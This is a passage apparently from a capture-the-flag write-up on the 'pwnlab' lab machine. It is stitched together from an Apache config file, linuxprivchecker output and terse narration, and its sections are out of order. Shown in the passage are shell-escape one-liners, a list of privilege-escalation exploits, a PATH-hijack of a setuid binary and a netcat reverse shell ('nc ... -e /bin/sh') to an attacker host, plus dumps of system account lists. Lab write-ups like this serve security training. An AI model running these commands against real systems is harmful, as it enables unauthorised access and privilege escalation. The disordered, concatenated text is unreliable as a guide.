# * apache2.conf is the main configuration file (this file). It puts the pieces
# together by including all remaining configuration files when starting up the
# web server.
#
# * ports.conf is always included from the main configuration file. It is
# supposed to determine listening ports for incoming connections which can be
# customized anytime.
#
# * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/
# directories contain particular configuration snippets which manage modules,
# global configuration fragments, or virtual host configurations,
# respectively.
#
# They are activated by symlinking available configuration files from their
# respective *-available/ counterparts. These should be managed by using our
# helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See
# their respective man pages for detailed information.
#
# * The binary is called apache2. Due to the use of environment variables, in
# the default configuration, apache2 needs to be started/stopped with
# /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not
# work with the default configuration.
# Global configuration
#
#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# NOTE! If you intend to place this on an NFS (or otherwise network)
# mounted filesystem then please read the Mutex documentation (available
# at );
# you will save yourself a lot of trouble.
#
# Do NOT add a slash at the end of the directory path.
#
#ServerRoot "/etc/apache2"
#
# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
#
Mutex file:${APACHE_LOCK_DIR} default
#
# PidFile: The file in which the server should record its process
# identification number when it starts.
# This needs to be set in /etc/apache2/envvars
#
PidFile ${APACHE_PID_FILE}
#
# Timeout: The number of seconds before receives and sends time out.
#
Timeout 300
#
# KeepAlive: Whether or not to allow persistent connections (more than
# one request per connection). Set to "Off" to deactivate.
#
KeepAlive On
#
# MaxKeepAliveRequests: The maximum number of requests to allow
# during a persistent connection. Set to 0 to allow an unlimited amount.
# We recommend you leave this number high, for maximum performance.
#
MaxKeepAliveRequests 100
#
# KeepAliveTimeout: Number of seconds to wait for the next request from the
# same client on the same connection.
#
KeepAliveTimeout 5
# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
#
# HostnameLookups: Log the names of clients or just their IP addresses
# e.g., www.apache.org (on) or 204.62.129.132 (off).
# The default is off because it'd be overall better for the net if people
# had to knowingly turn this feature on, since enabling it means that
# each client request will result in AT LEAST one lookup request to the
# nameserver.
#
HostnameLookups Off
# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a
# container, error messages relating to that virtual host will be
# logged here. If you *do* define an error logfile for a
# container, that host's errors will be logged there and not here.
#
ErrorLog ${APACHE_LOG_DIR}/error.log
#
# LogLevel: Control the severity of messages logged to the error_log.
# Available values: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the log level for particular modules, e.g.
# "LogLevel info ssl:warn"
#
LogLevel warn
# Include module configuration:
IncludeOptional mods-enabled/*.load
IncludeOptional mods-enabled/*.conf
# Include list of ports to listen on
Include ports.conf
# Sets the default security model of the Apache2 HTTPD server. It does
# not allow access to the root filesystem outside of /usr/share and /var/www.
# The former is used by web applications packaged in Debian,
# the latter may be used for local directories served by the web server. If
# your system is serving content from a sub-directory in /srv you must allow
# access here, or in any related virtual host.
AllowOverride None
Require all granted
Require all denied
#
# The following directives define some format nicknames for use with
# a CustomLog directive.
#
# These deviate from the Common Log Format definitions in that they use %O
# (the actual bytes sent including headers) instead of %b (the size of the
# requested file), because the latter makes it impossible to detect partial
# requests.
#
# Note that the use of %{X-Forwarded-For}i instead of %h is not recommended.
# Use mod_remoteip instead.
#
LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
# Include of directories ignores editors' and dpkg's backup files,
# see README.Debian for details.
# Include generic snippets of statements
IncludeOptional conf-enabled/*.conf
# Include the virtual host configurations:
IncludeOptional sites-enabled/*.conf
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
[+] Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)
[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...
root 2587 Oct04 0:00 ./msg2root
root 1916 Oct04 0:00 su
root 126 Oct04 0:00 [kauditd]
root 2527 Oct04 0:00 sh
root 29 Oct04 0:00 [kthrotld]
root 2470 Oct04 0:00 ./msg2root
root 8 Oct04 0:00 [rcu_bh]
root 30 Oct04 0:00 [ipv6_addrconf]
root 13 Oct04 0:00 [netns]
root 383 Oct04 0:00 /usr/sbin/cron
Possible Related Packages:
cron 3.0pl1-127+deb8u1 process scheduling daemon
root 15 Oct04 0:00 [writeback]
root 2605 Oct04 0:00 su
root 2529 Oct04 0:00 /bin/sh
root 22 Oct04 0:00 [kswapd0]
root 482 Oct04 0:12 /usr/sbin/apache2
Possible Related Packages:
apache2 2.4.10-10+deb8u4 Apache HTTP Server
apache2-bin 2.4.10-10+deb8u4 Apache HTTP Server (modules and other binary files)
apache2-data 2.4.10-10+deb8u4 Apache HTTP Server (common files)
apache2-utils 2.4.10-10+deb8u4 Apache HTTP Server (utility programs for web servers)
libapache2-mod-php5 5.6.17+dfsg-0+deb8u1 server-side, HTML-embedded scripting language (Apache 2 module)
root 2513 Oct04 0:00 sh
root 2489 Oct04 0:00 su
root 382 Oct04 0:00 /usr/sbin/rpc.idmapd
root 71 Oct04 0:15 [kworker/u2:2]
root 1968 Oct04 0:00 su
root 2670 Oct04 0:00 su
root 70 Oct04 0:00 [scsi_tmf_0]
root 419 Oct04 0:00 /sbin/agetty
root 17 Oct04 0:00 [crypto]
root 2848 00:17 0:00 su
root 127 Oct04 0:00 /lib/systemd/systemd-journald
root 1244 Oct04 2:15 [kworker/0:0]
root 5 Oct04 0:00 [kworker/0:0H]
root 20 Oct04 0:00 [kblockd]
root 136 Oct04 0:00 /lib/systemd/systemd-udevd
root 344 Oct04 0:00 /sbin/rpcbind
Possible Related Packages:
rpcbind 0.2.1-6+deb8u1 converts RPC program numbers into universal addresses
root 1716 Oct04 0:00 su
root 2878 00:21 0:00 su
root 3 Oct04 1:10 [ksoftirqd/0]
root 407 Oct04 0:00 /usr/sbin/rsyslogd
root 2865 00:20 0:00 su
root 16 Oct04 0:00 [ksmd]
root 2471 Oct04 0:00 sh
root 1517 Oct04 0:00 su
root 2771 Oct04 0:00 [kworker/u2:0]
root 375 Oct04 0:00 [nfsiod]
root 1987 Oct04 0:00 su
root 31 Oct04 0:00 [deferwq]
root 386 Oct04 0:00 /lib/systemd/systemd-logind
root 2 Oct04 0:00 [kthreadd]
root 373 Oct04 0:00 [rpciod]
root 95 Oct04 0:00 [jbd2/sda1-8]
root 2588 Oct04 0:00 sh
root 10 Oct04 0:04 [watchdog/0]
root 18 Oct04 0:00 [kintegrityd]
root 1198 Oct04 0:00 dhclient
root 2170 Oct04 0:00 su
root 23 Oct04 0:00 [fsnotify_mark]
root 1 Oct04 0:01 /sbin/init
Possible Related Packages:
init 1.22 System-V-like init utilities - metapackage
init-system-helpers 1.22 helper tools for all init systems
initramfs-tools 0.120 generic modular initramfs generator
initscripts 2.88dsf-59 scripts for initializing and shutting down the system
insserv 1.14.0-5 boot sequence organizer using LSB init.d script dependency information
libklibc 2.0.4-2 minimal libc subset for use with initramfs
lsb-base 4.1+Debian13+nmu1 Linux Standard Base 4.1 init script functionality
ncurses-base 5.9+20140913-1 basic terminal type definitions
ncurses-term 5.9+20140913-1 additional terminal type definitions
sysvinit-utils 2.88dsf-59 System-V-like utilities
root 3072 00:22 0:00 su
root 68 Oct04 0:00 [mpt/0]
root 19 Oct04 0:00 [bioset]
root 14 Oct04 0:00 [khungtaskd]
root 7 Oct04 0:05 [rcu_sched]
root 1923 Oct04 0:00 su
root 2523 Oct04 0:00 ./msg2root
root 67 Oct04 0:00 [mpt_poll_0]
root 2177 Oct04 0:00 su
root 409 Oct04 0:00 /usr/sbin/acpid
Possible Related Packages:
acpid 1:2.0.23-2 Advanced Configuration and Power Interface event daemon
root 74 Oct04 0:00 [kworker/0:1H]
root 2512 Oct04 0:00 ./msg2root
root 1435 Oct04 0:00 procmail
Possible Related Packages:
procmail 3.22-24 Versatile e-mail processor
root 12 Oct04 0:00 [kdevtmpfs]
root 69 Oct04 0:00 [scsi_eh_0]
root 169 Oct04 0:00 [kpsmoused]
root 2565 Oct04 0:00 su
root 66 Oct04 0:00 [khubd]
root 9 Oct04 0:00 [migration/0]
root 96 Oct04 0:00 [ext4-rsv-conver]
root 222 Oct04 0:00 [kworker/0:4]
root 441 Oct04 0:00 /bin/sh
root 11 Oct04 0:00 [khelper]
[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...
[+] Installed Tools
/usr/bin/awk
/usr/bin/perl
/usr/bin/python
/usr/bin/gcc
/usr/bin/cc
/usr/bin/vi
/usr/bin/find
/bin/netcat
/bin/nc
/usr/bin/wget
/usr/bin/ftp
[+] Related Shell Escape Sequences...
vi--> :!bash
vi--> :set shell=/bin/bash:shell
awk--> awk 'BEGIN {system("/bin/bash")}'
find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
perl--> perl -e 'exec "/bin/bash";'
[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
- Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit || http://www.exploit-db.com/exploits/5720 || Language=python
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
The following exploits are applicable to this kernel version and should be investigated as well
- Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
- Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**
- CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
- CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
- open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
- open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c
Finished
=================================================================================================
I found a file that is owned by mike and it has executable permissions for kane (/home/kane/msgmike):
kane@pwnlab:/var/www/html/upload$ cd;ls -l cd;ls -l total 8 -rwsr-sr-x 1 mike mike 5148 Mar 17 2016 msgmike kane@pwnlab:~$ file msgmike file msgmike msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped kane@pwnlab:~$ strings msgmike strings msgmike /lib/ld-linux.so.2 libc.so.6 _IO_stdin_used setregid setreuid system __libc_start_main __gmon_start__ GLIBC_2.0 PTRh QVh[ [^_] cat /home/mike/msg.txt ;*2$"( GCC: (Debian 4.9.2-10) 4.9.2 GCC: (Debian 4.8.4-1) 4.8.4 .symtab .strtab .shstrtab .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .text .fini .rodata .eh_frame_hdr .eh_frame .init_array .fini_array .jcr .dynamic .got .got.plt .data .bss .comment crtstuff.c __JCR_LIST__ deregister_tm_clones register_tm_clones __do_global_dtors_aux completed.6279 __do_global_dtors_aux_fini_array_entry frame_dummy __frame_dummy_init_array_entry msgmike.c __FRAME_END__ __JCR_END__ __init_array_end _DYNAMIC __init_array_start _GLOBAL_OFFSET_TABLE_ __libc_csu_fini _ITM_deregisterTMCloneTable __x86.get_pc_thunk.bx data_start _edata _fini __data_start system@@GLIBC_2.0 __gmon_start__ __dso_handle _IO_stdin_used setreuid@@GLIBC_2.0 __libc_start_main@@GLIBC_2.0 __libc_csu_init _end _start _fp_hw __bss_start main setregid@@GLIBC_2.0 _Jv_RegisterClasses __TMC_END__ _ITM_registerTMCloneTable _init
This file performs a cat command (cat /home/mike/msg.txt) using mike's privileges. I decided to create a cat command and manipulate $PATH in order to gain another shell:
kane@pwnlab:~$ echo 'nc 192.168.43.3 4445 -e /bin/sh' > cat echo 'nc 192.168.43.3 4445 -e /bin/sh' > cat kane@pwnlab:~$ echo $PATH echo $PATH /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games kane@pwnlab:~$ export PATH=.:$PATH export PATH=.:$PATH kane@pwnlab:~$ chmod +x cat chmod +x cat kane@pwnlab:~$ ./msgmike ./msgmike
It worked. Next, I tried to escalate my privileges to root:
[gandosha@GandoPC 192.168.43.4]$ ncat -lvnp 4445
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
Ncat: Connection from 192.168.43.4.
Ncat: Connection from 192.168.43.4:55415.
python -c 'import pty;pty.spawn("/bin/bash")'
mike@pwnlab:~$ ls
ls
cat msgmike
mike@pwnlab:~$ cd /var/www/html/upload;ls
cd /var/www/html/upload;ls
f8c3fc737f057212414e67a22be29837.png linuxprivchecker.py
mike@pwnlab:/var/www/html/upload$ python ./linuxprivchecker.py
python ./linuxprivchecker.py
=================================================================================================
LINUX PRIVILEGE ESCALATION CHECKER
=================================================================================================
[*] GETTING BASIC SYSTEM INFO...
[+] Kernel
Linux version 3.16.0-4-686-pae (debian-kernel@lists.debian.org) (gcc version 4.8.4 (Debian 4.8.4-1) ) #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29)
[+] Hostname
pwnlab
[+] Operating System
Debian GNU/Linux 8 \n \l
[*] GETTING NETWORKING INFO...
[+] Interfaces
eth0 Link encap:Ethernet HWaddr 08:00:27:0d:33:06
inet addr:192.168.43.4 Bcast:192.168.43.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe0d:3306/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:332731 errors:127 dropped:0 overruns:0 frame:0
TX packets:370434 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:64952570 (61.9 MiB) TX bytes:122970085 (117.2 MiB)
Interrupt:9 Base address:0xd000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:115 errors:0 dropped:0 overruns:0 frame:0
TX packets:115 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:11328 (11.0 KiB) TX bytes:11328 (11.0 KiB)
[+] Netstat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:57126 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 192.168.43.4:36632 192.168.43.3:4444 ESTABLISHED -
tcp 0 0 192.168.43.4:55409 192.168.43.3:4445 CLOSE_WAIT 2614/bash
tcp 0 0 192.168.43.4:52258 192.168.43.3:4446 CLOSE_WAIT 2476/python
tcp 0 0 192.168.43.4:55404 192.168.43.3:4445 CLOSE_WAIT 2198/bash
tcp 0 0 192.168.43.4:55415 192.168.43.3:4445 ESTABLISHED 3270/sh
tcp 0 0 192.168.43.4:52261 192.168.43.3:4446 CLOSE_WAIT 2592/python
tcp 0 0 192.168.43.4:36650 192.168.43.3:4444 ESTABLISHED 3268/sh
tcp 0 0 192.168.43.4:36635 192.168.43.3:4444 CLOSE_WAIT -
tcp 0 0 192.168.43.4:55406 192.168.43.3:4445 CLOSE_WAIT 2503/bash
tcp 0 0 192.168.43.4:55407 192.168.43.3:4445 CLOSE_WAIT 2577/bash
tcp6 0 0 :::111 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 ::1:25 :::* LISTEN -
tcp6 0 0 :::50425 :::* LISTEN -
tcp6 0 0 192.168.43.4:80 192.168.43.3:39473 ESTABLISHED -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp 0 0 0.0.0.0:941 0.0.0.0:* -
udp 0 0 0.0.0.0:10930 0.0.0.0:* -
udp 0 0 0.0.0.0:43447 0.0.0.0:* -
udp 0 0 127.0.0.1:968 0.0.0.0:* -
udp6 0 0 :::111 :::* -
udp6 0 0 :::20347 :::* -
udp6 0 0 :::39820 :::* -
udp6 0 0 :::941 :::* -
[+] Route
[*] GETTING FILESYSTEM INFO...
[+] Mount results
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
udev on /dev type devtmpfs (rw,relatime,size=10240k,nr_inodes=62179,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
tmpfs on /run type tmpfs (rw,nosuid,relatime,size=102412k,mode=755)
/dev/sda1 on / type ext4 (rw,relatime,errors=remount-ro,data=ordered)
securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd)
pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=23,pgrp=1,timeout=300,minproto=5,maxproto=5,direct)
debugfs on /sys/kernel/debug type debugfs (rw,relatime)
hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
mqueue on /dev/mqueue type mqueue (rw,relatime)
rpc_pipefs on /run/rpc_pipefs type rpc_pipefs (rw,relatime)
binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime)
[+] fstab entries
# /etc/fstab: static file system information.
#
# Use 'blkid' to print the universally unique identifier for a
# device; this may be used with UUID= as a more robust way to name devices
# that works even if disks are added and removed. See fstab(5).
#
#
# / was on /dev/sda1 during installation
UUID=16b0f3af-7854-4ead-8185-6c248062701c / ext4 errors=remount-ro 0 1
# swap was on /dev/sda5 during installation
UUID=59d16917-774d-43d9-9324-829b365bcfbf none swap sw 0 0
/dev/sr0 /media/cdrom0 udf,iso9660 user,noauto 0 0
[+] Scheduled cron jobs
-rw-r--r-- 1 root root 722 Jun 7 2015 /etc/crontab
/etc/cron.d:
total 16
drwxr-xr-x 2 root root 4096 Mar 17 2016 .
drwxr-xr-x 85 root root 4096 Oct 4 13:55 ..
-rw-r--r-- 1 root root 661 Jan 15 2016 php5
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
/etc/cron.daily:
total 68
drwxr-xr-x 2 root root 4096 Mar 17 2016 .
drwxr-xr-x 85 root root 4096 Oct 4 13:55 ..
-rwxr-xr-x 1 root root 625 Jan 2 2016 apache2
-rwxr-xr-x 1 root root 15000 Sep 18 2015 apt
-rwxr-xr-x 1 root root 314 Nov 8 2014 aptitude
-rwxr-xr-x 1 root root 355 Oct 17 2014 bsdmainutils
-rwxr-xr-x 1 root root 1597 Nov 26 2015 dpkg
-rwxr-xr-x 1 root root 4125 Mar 13 2016 exim4-base
-rwxr-xr-x 1 root root 89 Nov 8 2014 logrotate
-rwxr-xr-x 1 root root 1293 Dec 31 2014 man-db
-rwxr-xr-x 1 root root 435 Jun 13 2013 mlocate
-rwxr-xr-x 1 root root 249 Nov 19 2015 passwd
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Mar 17 2016 .
drwxr-xr-x 85 root root 4096 Oct 4 13:55 ..
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Mar 17 2016 .
drwxr-xr-x 85 root root 4096 Oct 4 13:55 ..
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
/etc/cron.weekly:
total 16
drwxr-xr-x 2 root root 4096 Mar 17 2016 .
drwxr-xr-x 85 root root 4096 Oct 4 13:55 ..
-rwxr-xr-x 1 root root 771 Dec 31 2014 man-db
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
[+] Writable cron dirs
[*] ENUMERATING USER AND ENVIRONMENTAL INFO...
[+] Logged in User Activity
00:29:17 up 10:23, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
[+] Super Users Found:
root
[+] Environment
MAIL=/var/mail/kane
USER=kane
SHLVL=3
HOME=/home/kane
OLDPWD=/home/kane
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
LOGNAME=kane
_=/usr/bin/python
PATH=.:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
APACHE_LOCK_DIR=/var/lock/apache2
LANG=en_US.UTF-8
SHELL=/bin/bash
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/var/www/html/upload
[+] Root and current user history (depends on privs)
[+] Sudoers (privileged)
[+] All users
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
john:x:1000:1000:,,,:/home/john:/bin/bash
kent:x:1001:1001:,,,:/home/kent:/bin/bash
mike:x:1002:1002:,,,:/home/mike:/bin/bash
kane:x:1003:1003:,,,:/home/kane:/bin/bash
mysql:x:107:113:MySQL Server,,,:/nonexistent:/bin/false
[+] Current User
mike
[+] Current User ID
uid=1002(mike) gid=1002(mike) groups=1002(mike),1003(kane)
[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...
[+] World Writeable Directories for User/Group 'Root'
drwxrwxrwt 2 root root 40 Oct 4 11:06 /dev/mqueue
drwxrwxrwt 2 root root 40 Oct 4 14:06 /dev/shm
drwxrwxrwt 7 root root 4096 Oct 5 00:21 /tmp
drwxrwxrwt 2 root root 4096 Oct 4 14:06 /tmp/.X11-unix
drwxrwxrwt 2 root root 4096 Oct 4 14:06 /tmp/.XIM-unix
drwxrwxrwt 2 root root 4096 Oct 4 14:06 /tmp/.Test-unix
drwxrwxrwt 2 root root 4096 Oct 4 14:06 /tmp/.font-unix
drwxrwxrwt 2 root root 4096 Oct 4 14:06 /tmp/.ICE-unix
drwxrwxrwt 2 root root 4096 Mar 17 2016 /var/tmp
drwx-wx-wt 2 root root 4096 Oct 5 00:16 /var/lib/php5/sessions
drwxrwxrwt 5 root root 100 Oct 4 14:06 /run/lock
[+] World Writeable Directories for Users other than Root
[+] World Writable Files
[+] Checking if root's home folder is accessible
[+] SUID/SGID Files and Directories
-rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount
-rwsr-xr-x 1 root root 38868 Nov 19 2015 /bin/su
-rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount
drwxrwsr-x 2 root mail 4096 Mar 17 2016 /var/mail
drwxrwsr-x 2 root staff 4096 Jan 17 2016 /var/local
drwxr-s--- 2 mysql adm 4096 Mar 17 2016 /var/log/mysql
drwxr-s--- 2 Debian-exim adm 4096 Mar 17 2016 /var/log/exim4
drwxr-sr-x 2 man root 4096 Mar 17 2016 /var/cache/man
-rwsr-xr-x 1 root root 96760 Aug 13 2014 /sbin/mount.nfs
-rwxr-sr-x 1 root shadow 34424 Jan 9 2016 /sbin/unix_chkpwd
-rwsr-sr-x 1 root root 5364 Mar 17 2016 /home/mike/msg2root
-rwsr-sr-x 1 mike mike 5148 Mar 17 2016 /home/kane/msgmike
drwxr-sr-x 3 root systemd-journal 60 Oct 4 14:06 /run/log/journal
drwxr-s--- 2 root systemd-journal 60 Oct 4 14:06 /run/log/journal/41c5984e6ab94241b1052c2059fb4b2f
-rwsr-xr-x 1 root root 38740 Nov 19 2015 /usr/bin/newgrp
-rwsr-xr-x 1 root root 52344 Nov 19 2015 /usr/bin/chfn
-rwxr-sr-x 1 root ssh 419192 Jan 13 2016 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 9680 Oct 17 2014 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 13892 Jun 2 2013 /usr/bin/dotlockfile
-rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at
-rwxr-sr-x 1 root mail 17880 Feb 11 2015 /usr/bin/lockfile
-rwxr-sr-x 1 root crontab 38844 Jun 7 2015 /usr/bin/crontab
-rwsr-xr-x 1 root root 53112 Nov 19 2015 /usr/bin/passwd
-rwxr-sr-x 1 root shadow 61232 Nov 19 2015 /usr/bin/chage
-rwxr-sr-x 1 root mlocate 32116 Jun 13 2013 /usr/bin/mlocate
-rwxr-sr-x 1 root shadow 21964 Nov 19 2015 /usr/bin/expiry
-rwsr-sr-x 1 root mail 96192 Feb 11 2015 /usr/bin/procmail
-rwxr-sr-x 1 root tty 26240 Mar 29 2015 /usr/bin/wall
-rwxr-sr-x 1 root mail 9772 Dec 4 2014 /usr/bin/mutt_dotlock
-rwsr-xr-x 1 root root 43576 Nov 19 2015 /usr/bin/chsh
-rwsr-xr-x 1 root root 78072 Nov 19 2015 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 5372 Feb 24 2014 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 9540 Feb 11 2016 /usr/lib/pt_chown
-rwsr-xr-- 1 root messagebus 362672 Aug 2 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 562536 Jan 13 2016 /usr/lib/openssh/ssh-keysign
drwxrwsr-x 10 root staff 4096 Mar 17 2016 /usr/local
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/include
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/games
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/bin
drwxrwsr-x 3 root staff 4096 Mar 17 2016 /usr/local/lib
drwxrwsr-x 4 root staff 4096 Mar 17 2016 /usr/local/lib/python2.7
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/lib/python2.7/dist-packages
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/lib/python2.7/site-packages
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/src
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/sbin
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/etc
drwxrwsr-x 8 root staff 4096 Mar 17 2016 /usr/local/share
drwxrwsr-x 3 root staff 4096 Mar 17 2016 /usr/local/share/emacs
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/emacs/site-lisp
drwxrwsr-x 6 root staff 4096 Mar 17 2016 /usr/local/share/xml
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/xml/schema
